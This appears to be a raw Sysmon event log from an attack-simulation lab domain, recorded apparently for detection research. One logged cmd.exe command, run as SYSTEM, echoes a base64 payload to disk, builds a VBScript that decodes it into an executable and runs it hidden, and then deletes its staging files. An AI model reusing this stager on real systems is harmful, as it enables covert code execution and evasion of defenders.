10341000x8000000000000000113822220Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.948{0BBB6F36-25A3-6379-4243-000000009902}1666014300C:\Program Files\Aurora-Agent\aurora-agent.exe{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6b98(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013800190)NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x8000000000000000113822219Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.948{0BBB6F36-25A3-6379-4243-000000009902}1666014300C:\Program Files\Aurora-Agent\aurora-agent.exe{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6b98(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013800190)NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x8000000000000000113822218Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.948{0BBB6F36-25A3-6379-4243-000000009902}1666014300C:\Program Files\Aurora-Agent\aurora-agent.exe{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6b98(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013800190)NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x8000000000000000113821924Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.571{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\SysWOW64\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=F18662FD1BCB04019CA35313C7BD1AB0,SHA256=44968455D3EEA914958BF90A83BA9311E9311676C32D8D46BB6109DF655738A4trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821923Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.567{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\SysWOW64\wsock32.dll10.0.14393.0 (rs1_release.160715-1616)Windows Socket 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationwsock32.dllMD5=7BC233F49C60B2FC6869B05318C02D64,SHA256=D025C4B2E79DC0157BA636BBEBD4DC63E0AC41D442798532E09A1573461E0979trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821922Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.567{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\SysWOW64\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=89AC96525FB527CDF4FFDCDF657A3923,SHA256=737BC5E7586D9AB6306949B1470DB3DBE576638A010EEF7A297126BE30841C2FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821921Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.566{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821920Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.566{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821919Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.565{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.5427 (rs1_release.220929-2054)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=B422D6D349B239AA5DA5B66297A085B3,SHA256=3708B080455F4563B863211A4D602AE11CEBDEB94C8846EE580503C4F4A4DFE7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821918Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.565{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.5291 (rs1_release.220806-1444)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=C6EE0DB29435BF41835FFA96EB2F14C5,SHA256=CAF9E05D47F84728986E1BF563B3B87FAF3522F4E0CC4FD95694F418C307AD92trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821917Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.565{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=495127E6E6D5CAEDE18A809EAEFFC349,SHA256=9F621D36BCD75AE97E1BCBA9BBFD75FEC74C6CA87AEF81F3190173CBF7CC2A45trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821916Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.564{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.5427 (rs1_release.220929-2054)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C830A662D2219E9BFB13ED2894026915,SHA256=CB8048F560CC4FF567D2A8C2657004E70902855CCA50B4705A8053587E1ED007trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821915Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.564{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821914Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.558{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\SysWOW64\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=C5114D5A60467157B35D494D927325AB,SHA256=BE91B4149E5C074DE9055BF3914EF746F9776C2771BEA9E0336867A82A827C0DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821913Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.556{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.5427 (rs1_release.220929-2054)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=40609845B5F71A923CADA8E9BE0DBCD3,SHA256=4A37BC90B133F9E768570F8DD15ACFB242D766D91161ED927EB6D059E8A1E026trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821911Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.554{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.5427 (rs1_release.220929-2054)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E7250A347FA497C9A44FA84493C36B4C,SHA256=3187F14835C7B9184DC17D69310E180A48A11DB29101F2866B84B1708252B121trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821910Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.553{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821909Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.553{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821908Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.549{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\Temp\WLSZY.exe2.2.14ApacheBench command line utilityApache HTTP ServerApache Software Foundationab.exeMD5=736FA5C47BAA04592A34A4F08ED1D21A,SHA256=66D2F922134572BFA63D9F771EBFFEBED3BEF2974619B33E2ADA7796B3FB4457false-UnavailableATTACKRANGE\Administrator 734700x8000000000000000113821907Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.552{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\System32\kernel32.dll10.0.14393.5427 (rs1_release.220929-2054)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=800CA8E5D4ABA626E6E7043CB42DF86D,SHA256=874CA13B41198861EE041925482D7F7DC1E2AD03986BA95F5428127CE50D8279trueMicrosoft WindowsValidATTACKRANGE\Administrator 13241300x8000000000000000113821905Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-SetValue2022-11-21 14:16:04.552{0BBB6F36-3671-6378-9000-000000009902}5708C:\Windows\Explorer.EXEHKU\S-1-5-21-2137322379-330257881-3279475299-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{BC47D647-E4AE-4214-BACA-8D8D19CF1901}\AppId{F38BF404-1D43-42F2-9305-67DE0B28FC23}\Temp\WLSZY.exeATTACKRANGE\Administrator 734700x8000000000000000113821904Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.552{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.5427 (rs1_release.220929-2054)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E7250A347FA497C9A44FA84493C36B4C,SHA256=3187F14835C7B9184DC17D69310E180A48A11DB29101F2866B84B1708252B121trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821901Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.552{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\System32\kernel32.dll10.0.14393.5427 (rs1_release.220929-2054)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=800CA8E5D4ABA626E6E7043CB42DF86D,SHA256=874CA13B41198861EE041925482D7F7DC1E2AD03986BA95F5428127CE50D8279trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821897Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.551{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821896Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.551{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821893Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.550{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.5427 (rs1_release.220929-2054)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=008C343519B7638AEF1FBFD9DF26BC22,SHA256=9C5B8ED8542367D1DC5625AD5544C68ABB63C80887F2F448506581B32AA34CE5trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x8000000000000000113821892Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.550{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exeC:\Windows\System32\ntdll.dll10.0.14393.5427 (rs1_release.220929-2054)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=6E3E284D0AE13742E3057662A1463299,SHA256=A2C89978022CD2CB5FC62435C955CC84DEF43B7E9A8010E998F8826DD44FB176trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x8000000000000000113821890Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.549{0BBB6F36-3642-6378-1200-000000009902}7647032C:\Windows\System32\svchost.exe{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 13241300x8000000000000000113821889Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-SetValue2022-11-21 14:16:04.548{0BBB6F36-3642-6378-1200-000000009902}764C:\Windows\System32\svchost.exeHKU\S-1-5-21-2137322379-330257881-3279475299-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Windows\Temp\WLSZY.exeBinary DataNT AUTHORITY\SYSTEM 10341000x8000000000000000113821887Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.546{0BBB6F36-3642-6378-1200-000000009902}76410256C:\Windows\System32\svchost.exe{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5e9a4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7ac63|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+5342c|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x8000000000000000113821885Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.543{0BBB6F36-366E-6378-7C00-000000009902}45207160C:\Windows\system32\csrss.exe{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x8000000000000000113821884Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.543{0BBB6F36-3671-6378-9000-000000009902}570824924C:\Windows\Explorer.EXE{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a198f|C:\Windows\System32\windows.storage.dll+a1605|C:\Windows\System32\windows.storage.dll+a10f6|C:\Windows\System32\windows.storage.dll+a2568|C:\Windows\System32\windows.storage.dll+a0f1e|C:\Windows\System32\windows.storage.dll+a3abd|C:\Windows\System32\windows.storage.dll+a41fc|C:\Windows\System32\windows.storage.dll+a3560|C:\Windows\System32\windows.storage.dll+923aa|C:\Windows\System32\windows.storage.dll+92106|C:\Windows\System32\SHELL32.dll+4ca19|C:\Windows\System32\SHELL32.dll+4b5c6|C:\Windows\System32\SHELL32.dll+6d139|C:\Windows\System32\SHELL32.dll+e7e5e|C:\Windows\System32\SHELL32.dll+1542dc|C:\Windows\System32\SHELL32.dll+154033|C:\Windows\System32\SHCORE.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x8000000000000000113821883Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 14:16:04.497{0BBB6F36-8824-637B-7270-010000009902}21168C:\Windows\Temp\WLSZY.exe2.2.14ApacheBench command line utilityApache HTTP ServerApache Software Foundationab.exe"C:\Windows\Temp\WLSZY.exe" C:\Windows\Temp\ATTACKRANGE\Administrator{0BBB6F36-366F-6378-CB1C-090000000000}0x91ccb2HighMD5=736FA5C47BAA04592A34A4F08ED1D21A,SHA256=66D2F922134572BFA63D9F771EBFFEBED3BEF2974619B33E2ADA7796B3FB4457{0BBB6F36-3671-6378-9000-000000009902}5708C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECKATTACKRANGE\Administrator 154100x8000000000000000112200086Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 13:34:28.174{0BBB6F36-7E64-637B-686B-010000009902}19472C:\Windows\System32\cscript.exe5.812.10240.16384Microsoft ® Console Based Script HostMicrosoft ® Windows Script HostMicrosoft Corporationcscript.execscript //nologo C:\Windows\TEMP\OSyGE.vbs c:\windows\system32\inetsrv\NT AUTHORITY\SYSTEM{0BBB6F36-3640-6378-E703-000000000000}0x3e70SystemMD5=E1DD134E19E058147D1A35477289C18E,SHA256=2C0C92B939CB47A64ED6942E63F759974B0CC8A30EB401984F172EA3CC0730DC{0BBB6F36-7E64-637B-666B-010000009902}19192C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\OfpmF.b64 & echo Set fs = CreateObject("Scripting.FileSystemObject") >>%TEMP%\OSyGE.vbs & echo Set file = fs.GetFile("%TEMP%\OfpmF.b64") >>%TEMP%\OSyGE.vbs & echo If file.Size Then >>%TEMP%\OSyGE.vbs & echo Set fd = fs.OpenTextFile("%TEMP%\OfpmF.b64", 1) >>%TEMP%\OSyGE.vbs & echo data = fd.ReadAll >>%TEMP%\OSyGE.vbs & echo data = Replace(data, vbCrLf, "") >>%TEMP%\OSyGE.vbs & echo data = base64_decode(data) >>%TEMP%\OSyGE.vbs & echo fd.Close >>%TEMP%\OSyGE.vbs & echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("%TEMP%\WLSZY.exe", 2, True) >>%TEMP%\OSyGE.vbs & echo ofs.Write data >>%TEMP%\OSyGE.vbs & echo ofs.close >>%TEMP%\OSyGE.vbs & echo Set shell = CreateObject("Wscript.Shell") >>%TEMP%\OSyGE.vbs & echo shell.run "%TEMP%\WLSZY.exe", 0, false >>%TEMP%\OSyGE.vbs & echo Else >>%TEMP%\OSyGE.vbs & echo Wscript.Echo "The file is empty." >>%TEMP%\OSyGE.vbs & echo End If >>%TEMP%\OSyGE.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\OSyGE.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\OSyGE.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\OSyGE.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\OSyGE.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\OSyGE.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\OSyGE.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\OSyGE.vbs & echo If Not w2 Then _ >>%TEMP%\OSyGE.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\OSyGE.vbs & echo If Not w3 Then _ >>%TEMP%\OSyGE.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\OSyGE.vbs & echo If Not w4 Then _ >>%TEMP%\OSyGE.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\OSyGE.vbs & echo Next >>%TEMP%\OSyGE.vbs & echo base64_decode = strOut >>%TEMP%\OSyGE.vbs & echo End Function >>%TEMP%\OSyGE.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\OSyGE.vbs & echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>%TEMP%\OSyGE.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\OSyGE.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\OSyGE.vbs & echo Else >>%TEMP%\OSyGE.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\OSyGE.vbs & echo End If >>%TEMP%\OSyGE.vbs & echo End Function >>%TEMP%\OSyGE.vbs & cscript //nologo %TEMP%\OSyGE.vbs & del %TEMP%\OSyGE.vbs & del %TEMP%\OfpmF.b64NT AUTHORITY\SYSTEM 154100x8000000000000000112200051Microsoft-Windows-Sysmon/Operationalwin-dc-exch01.attackrange.local-2022-11-21 13:34:28.135{0BBB6F36-7E64-637B-676B-010000009902}10060C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsNT AUTHORITY\SYSTEM{0BBB6F36-3640-6378-E703-000000000000}0x3e70SystemMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{0BBB6F36-7E64-637B-666B-010000009902}19192C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c echo 